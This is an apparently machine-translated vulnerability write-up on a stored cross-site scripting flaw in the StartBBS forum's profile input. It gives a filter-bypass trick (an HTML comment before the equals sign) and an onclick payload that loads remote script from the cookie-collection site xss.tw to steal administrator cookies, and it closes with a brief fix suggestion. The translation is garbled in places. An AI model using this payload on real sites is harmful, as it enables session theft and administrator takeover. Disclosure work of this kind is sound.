Startbbs open-source forum storage-type xss blind access Administrator

Because startbbs does not properly filter user output, the stored xss startbbs adopts the mvc Architecture Design. However, improper filtering of user personal data input and output results in cross-site scripting attacks. 1. The target is located at the place that multiple users can enter. I will use the place entered on my website for testing. Input "onmouseover = alert (1) first and find it filtered into: after testing, it is found that all the equal signs with onxx will be filtered. Is there no way at this time? Neither. After fuzz, we found that we could bypass this: onmouseover <! ----> = "Alert (1) // This is because <! ----> The comment is just right. No <> characters are filtered here. Therefore, this can be bypassed. However, when loading js, I found that the fact is far from as simple as I thought. In this case, onmouseover cannot be used, but onclick can only be used. Because the site uses jq, we can write "onclick <! ----> = $. The final problem of getScript ('HTTP: // xss.tw/5524') comes again. We find that this write cannot be triggered because there is a double quotation mark (double quotation marks) added: Very interesting. We can go to $. add "Close him" before getScript. "Onclick <! ----> = "$. GetScript ('HTTP: // xss.tw/5524') after the user clicks my personal website, it becomes: maybe there is a question, why can't the data be obtained? Because the cookie data on xss.tw is full recently, no matter what data is displayed, it is empty .. Sadly-we can check whether our cookies are httponly: Confirm:

The above is clearly written .. Although xss.tw didn't get the cookie to log on, it has been proved that js can be introduced in this way, and the cookie key value is not added with httponly. Therefore, attackers can blindly access the administrator.Solution:Check user input and output carefully. Whitelist Filtering